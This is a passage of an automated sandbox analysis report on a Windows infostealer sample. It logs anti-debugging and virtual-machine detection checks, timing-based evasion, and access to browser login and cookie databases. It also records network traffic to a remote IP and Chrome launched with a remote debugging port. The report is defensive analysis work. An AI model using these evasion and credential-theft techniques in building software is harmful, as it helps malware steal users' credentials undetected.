Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 757099E second address: 75709AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75709AD second address: 75709B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75709B1 second address: 75709B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75709B5 second address: 75709BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75709BB second address: 7570A04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC7C0FA673Ch 0x0000000b xor cx, A6A8h 0x00000010 jmp 00007FC7C0FA673Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007FC7C0FA6749h 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 mov dh, 8Fh 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7570A04 second address: 7570A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, 0426h 0x00000012 mov ebx, 66C83CB2h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7570A22 second address: 7570A35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C0FA673Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 7570A35 second address: 7570A64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C1180B49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C1180B3Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75C0982 second address: 75C0986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75C0986 second address: 75C098C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75C098C second address: 75C0992 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75C0992 second address: 75C0996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75C0996 second address: 75C09B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7C0FA6742h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75C09B3 second address: 75C09DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, A1F4h 0x00000007 jmp 00007FC7C1180B3Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC7C1180B3Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75C09DA second address: 75C0A49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C0FA6747h 0x00000009 jmp 00007FC7C0FA6743h 0x0000000e popfd 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edi 0x0000001a pop eax 0x0000001b pushfd 0x0000001c jmp 00007FC7C0FA6743h 0x00000021 sbb cx, EEFEh 0x00000026 jmp 00007FC7C0FA6749h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe RDTSC instruction interceptor: First address: 75A0033 second address: 75A003A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Special instruction interceptor: First address: 143F982 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Special instruction interceptor: First address: 143FA3A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Special instruction interceptor: First address: 15D5FF5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Special instruction interceptor: First address: 15FCF49 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Special instruction interceptor: First address: 1656C16 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window / User API: threadDelayed 1492 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window / User API: threadDelayed 1114 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window / User API: threadDelayed 934 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window / User API: threadDelayed 969 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Window / User API: threadDelayed 983 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 1996 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Window / User API: threadDelayed 8003 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe API coverage: 1.0 %
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7932 Thread sleep count: 1492 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7932 Thread sleep time: -2985492s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7928 Thread sleep count: 1114 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7928 Thread sleep time: -2229114s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 8044 Thread sleep time: -32000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7920 Thread sleep count: 934 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7920 Thread sleep time: -1868934s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7924 Thread sleep count: 969 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7924 Thread sleep time: -1938969s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7944 Thread sleep count: 983 > 30 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe TID: 7944 Thread sleep time: -1966983s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7216 Thread sleep count: 1996 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7216 Thread sleep time: -199600s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7216 Thread sleep count: 8003 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 7216 Thread sleep time: -800300s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\.ms-ad\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: rGABp2MFj4.exe, 00000000.00000003.1455338329.0000000001D11000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
Source: Amcache.hve.14.dr Binary or memory string: VMware
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.14.dr Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: Amcache.hve.14.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.14.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.14.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.14.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.14.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.14.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.14.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: chrome.exe, 00000003.00000002.1856605311.00000131CD038000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.14.dr Binary or memory string: vmci.sys
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.14.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.14.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.14.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.14.dr Binary or memory string: VMware20,1
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.14.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.14.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.14.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.14.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.14.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.14.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.14.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.14.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\rGABp2MFj4.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: NTICE
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: SICE
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: SIWVID
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00708230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00708230
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_0070116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 9_2_0070116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00701160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_00701160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_007011A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 9_2_007011A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_007013C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 9_2_007013C9
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6C7284D0 cpuid 9_2_6C7284D0
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: msmpeng.exe
Source: rGABp2MFj4.exe, 00000000.00000003.1430394070.00000000078A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.14.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

barindex
Source: Yara match File source: 9.2.service123.exe.6c6a0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: service123.exe PID: 7188, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.8:49707 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\rGABp2MFj4.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior

Remote Access Functionality

barindex
Source: C:\Users\user\Desktop\rGABp2MFj4.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs